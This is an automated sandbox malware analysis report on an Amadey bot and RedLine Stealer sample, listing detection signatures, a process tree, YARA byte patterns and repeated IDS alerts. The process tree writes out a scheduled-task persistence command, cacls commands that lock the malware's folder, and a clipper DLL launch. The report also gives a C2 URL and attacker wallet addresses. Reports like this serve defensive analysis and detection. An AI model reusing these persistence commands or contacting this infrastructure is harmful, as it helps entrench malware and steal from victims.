Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 799407
MD5: 61a8c6a50c4a2c2990e45bc223464333
SHA1: 87334fa8b57e66c8193d9138f82f31caf2732d73
SHA256: fe010d21711adca99ed52b577c6bf8e2919f5e08f3ce65ce446f1a92f87a7e34
Tags: exe
Infos:

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadeys Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 6036 cmdline: C:\Users\user\Desktop\file.exe MD5: 61A8C6A50C4A2C2990E45BC223464333)
    • bjAg.exe (PID: 6052 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe MD5: 014BF36C5CA48AF27042E0BAF0B6D951)
      • ajAf.exe (PID: 6068 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe MD5: A00A64A5A243C8705D68786C6159E402)
      • nika.exe (PID: 1876 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 4980 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 5960 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5560 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 3300 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 5100 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 4148 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 6136 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 5224 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 2552 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 6120 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 1348 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4524 cmdline: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
  • 0x1040:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.827977648.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
2.2.ajAf.exe.1fc0e67.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
2.2.ajAf.exe.1fc0e67.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
9.2.mnolyk.exe.d80000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.3.file.exe.4aa7620.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
8.2.xriv.exe.170000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp: 02/06/23-14:17:06.175418
Source IP: 192.168.2.5
Destination IP: 62.204.41.4
SID: 2027700
Source Port: 49780
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449760802027700 02/06/23-14:17:01.327724
                          SID:2027700
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449973802027700 02/06/23-14:18:04.598157
                          SID:2027700
                          Source Port:49973
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449728802027700 02/06/23-14:16:43.785940
                          SID:2027700
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449985802027700 02/06/23-14:18:07.516141
                          SID:2027700
                          Source Port:49985
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449731802027700 02/06/23-14:16:47.855991
                          SID:2027700
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449798802027700 02/06/23-14:17:17.167240
                          SID:2027700
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449887802027700 02/06/23-14:17:41.597625
                          SID:2027700
                          Source Port:49887
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450249802027700 02/06/23-14:19:18.949648
                          SID:2027700
                          Source Port:50249
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449896802027700 02/06/23-14:17:43.821533
                          SID:2027700
                          Source Port:49896
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449737802027700 02/06/23-14:16:52.313327
                          SID:2027700
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450252802027700 02/06/23-14:19:19.663270
                          SID:2027700
                          Source Port:50252
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449826802027700 02/06/23-14:17:24.159355
                          SID:2027700
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450163802027700 02/06/23-14:18:56.264797
                          SID:2027700
                          Source Port:50163
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450191802027700 02/06/23-14:19:02.948025
                          SID:2027700
                          Source Port:50191
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450261802027700 02/06/23-14:19:21.842035
                          SID:2027700
                          Source Port:50261
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450093802027700 02/06/23-14:18:37.648522
                          SID:2027700
                          Source Port:50093
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449859802027700 02/06/23-14:17:33.007738
                          SID:2027700
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450004802027700 02/06/23-14:18:13.908824
                          SID:2027700
                          Source Port:50004
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450102802027700 02/06/23-14:18:39.827581
                          SID:2027700
                          Source Port:50102
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450258802027700 02/06/23-14:19:21.108804
                          SID:2027700
                          Source Port:50258
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450089802027700 02/06/23-14:18:36.683035
                          SID:2027700
                          Source Port:50089
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449960802027700 02/06/23-14:18:01.488614
                          SID:2027700
                          Source Port:49960
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449868802027700 02/06/23-14:17:36.986362
                          SID:2027700
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449709802027700 02/06/23-14:16:33.287572
                          SID:2027700
                          Source Port:49709
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449703802027700 02/06/23-14:16:31.801911
                          SID:2027700
                          Source Port:49703
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449810802027700 02/06/23-14:17:20.127758
                          SID:2027700
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449957802027700 02/06/23-14:18:00.788642
                          SID:2027700
                          Source Port:49957
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450092802027700 02/06/23-14:18:37.397614
                          SID:2027700
                          Source Port:50092
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450179802027700 02/06/23-14:19:00.072207
                          SID:2027700
                          Source Port:50179
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449827802027700 02/06/23-14:17:24.402563
                          SID:2027700
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449756802027700 02/06/23-14:17:00.296702
                          SID:2027700
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450233802027700 02/06/23-14:19:15.000212
                          SID:2027700
                          Source Port:50233
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449929802027700 02/06/23-14:17:52.146320
                          SID:2027700
                          Source Port:49929
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449797802027700 02/06/23-14:17:16.911714
                          SID:2027700
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450032802027700 02/06/23-14:18:20.769004
                          SID:2027700
                          Source Port:50032
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449740802027700 02/06/23-14:16:53.015336
                          SID:2027700
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449994802027700 02/06/23-14:18:09.678156
                          SID:2027700
                          Source Port:49994
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450121802027700 02/06/23-14:18:44.477396
                          SID:2027700
                          Source Port:50121
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450162802027700 02/06/23-14:18:56.026170
                          SID:2027700
                          Source Port:50162
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450073802027700 02/06/23-14:18:32.799222
                          SID:2027700
                          Source Port:50073
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449900802027700 02/06/23-14:17:44.895342
                          SID:2027700
                          Source Port:49900
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449941802027700 02/06/23-14:17:56.852297
                          SID:2027700
                          Source Port:49941
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450217802027700 02/06/23-14:19:11.137962
                          SID:2027700
                          Source Port:50217
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449953802027700 02/06/23-14:17:59.850998
                          SID:2027700
                          Source Port:49953
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449944802027700 02/06/23-14:17:57.633329
                          SID:2027700
                          Source Port:49944
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450119802027700 02/06/23-14:18:44.008779
                          SID:2027700
                          Source Port:50119
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449855802027700 02/06/23-14:17:31.349237
                          SID:2027700
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450036802027700 02/06/23-14:18:21.758203
                          SID:2027700
                          Source Port:50036
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450208802027700 02/06/23-14:19:07.190881
                          SID:2027700
                          Source Port:50208
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449769802027700 02/06/23-14:17:03.541604
                          SID:2027700
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449938802027700 02/06/23-14:17:56.145928
                          SID:2027700
                          Source Port:49938
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450220802027700 02/06/23-14:19:11.858797
                          SID:2027700
                          Source Port:50220
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450045802027700 02/06/23-14:18:23.896931
                          SID:2027700
                          Source Port:50045
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449883802027700 02/06/23-14:17:40.633559
                          SID:2027700
                          Source Port:49883
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450051802027700 02/06/23-14:18:25.382182
                          SID:2027700
                          Source Port:50051
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449916802027700 02/06/23-14:17:48.720590
                          SID:2027700
                          Source Port:49916
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450134802027700 02/06/23-14:18:47.648864
                          SID:2027700
                          Source Port:50134
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449785802027700 02/06/23-14:17:07.425626
                          SID:2027700
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449972802027700 02/06/23-14:18:04.364385
                          SID:2027700
                          Source Port:49972
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450106802027700 02/06/23-14:18:40.803738
                          SID:2027700
                          Source Port:50106
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449966802027700 02/06/23-14:18:02.959272
                          SID:2027700
                          Source Port:49966
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450017802027700 02/06/23-14:18:17.179298
                          SID:2027700
                          Source Port:50017
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449712802027700 02/06/23-14:16:34.380434
                          SID:2027700
                          Source Port:49712
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449801802027700 02/06/23-14:17:17.902350
                          SID:2027700
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449925802027700 02/06/23-14:17:50.890187
                          SID:2027700
                          Source Port:49925
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450236802027700 02/06/23-14:19:15.762067
                          SID:2027700
                          Source Port:50236
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449842802027700 02/06/23-14:17:28.111422
                          SID:2027700
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449753802027700 02/06/23-14:16:59.551732
                          SID:2027700
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449699802027700 02/06/23-14:16:30.811358
                          SID:2027700
                          Source Port:49699
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449772802027700 02/06/23-14:17:04.254514
                          SID:2027700
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450188802027700 02/06/23-14:19:02.215108
                          SID:2027700
                          Source Port:50188
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450023802027700 02/06/23-14:18:18.602365
                          SID:2027700
                          Source Port:50023
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450064802027700 02/06/23-14:18:28.682743
                          SID:2027700
                          Source Port:50064
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450147802027700 02/06/23-14:18:52.469914
                          SID:2027700
                          Source Port:50147
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450151802027700 02/06/23-14:18:53.414300
                          SID:2027700
                          Source Port:50151
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449979802027700 02/06/23-14:18:06.054835
                          SID:2027700
                          Source Port:49979
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449921802027700 02/06/23-14:17:49.926933
                          SID:2027700
                          Source Port:49921
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450068802027700 02/06/23-14:18:29.946527
                          SID:2027700
                          Source Port:50068
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450246802027700 02/06/23-14:19:18.198358
                          SID:2027700
                          Source Port:50246
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449743802027700 02/06/23-14:16:53.921247
                          SID:2027700
                          Source Port:49743
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449771802027700 02/06/23-14:17:04.019414
                          SID:2027700
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449899802027700 02/06/23-14:17:44.645815
                          SID:2027700
                          Source Port:49899
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450010802027700 02/06/23-14:18:15.475260
                          SID:2027700
                          Source Port:50010
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450123802027700 02/06/23-14:18:44.976744
                          SID:2027700
                          Source Port:50123
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          SID:2027700
                          Source Port:50161
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449891802027700 02/06/23-14:17:42.583953
                          SID:2027700
                          Source Port:49891
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450034802027700 02/06/23-14:18:21.257214
                          SID:2027700
                          Source Port:50034
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450075802027700 02/06/23-14:18:33.288721
                          SID:2027700
                          Source Port:50075
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450164802027700 02/06/23-14:18:56.510220
                          SID:2027700
                          Source Port:50164
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449914802027700 02/06/23-14:17:48.241764
                          SID:2027700
                          Source Port:49914
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449980802027700 02/06/23-14:18:06.304828
                          SID:2027700
                          Source Port:49980
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449761802027700 02/06/23-14:17:01.580132
                          SID:2027700
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449850802027700 02/06/23-14:17:30.084700
                          SID:2027700
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450225802027700 02/06/23-14:19:13.073061
                          SID:2027700
                          Source Port:50225
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449736802027700 02/06/23-14:16:52.079670
                          SID:2027700
                          Source Port:49736
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449866802027700 02/06/23-14:17:36.501145
                          SID:2027700
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449825802027700 02/06/23-14:17:23.920192
                          SID:2027700
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449996802027700 02/06/23-14:18:10.162120
                          SID:2027700
                          Source Port:49996
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.450006802027700 02/06/23-14:18:14.489864
                          SID:2027700
                          Source Port:50006
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.562.204.41.449955802027700 02/06/23-14:18:00.317509
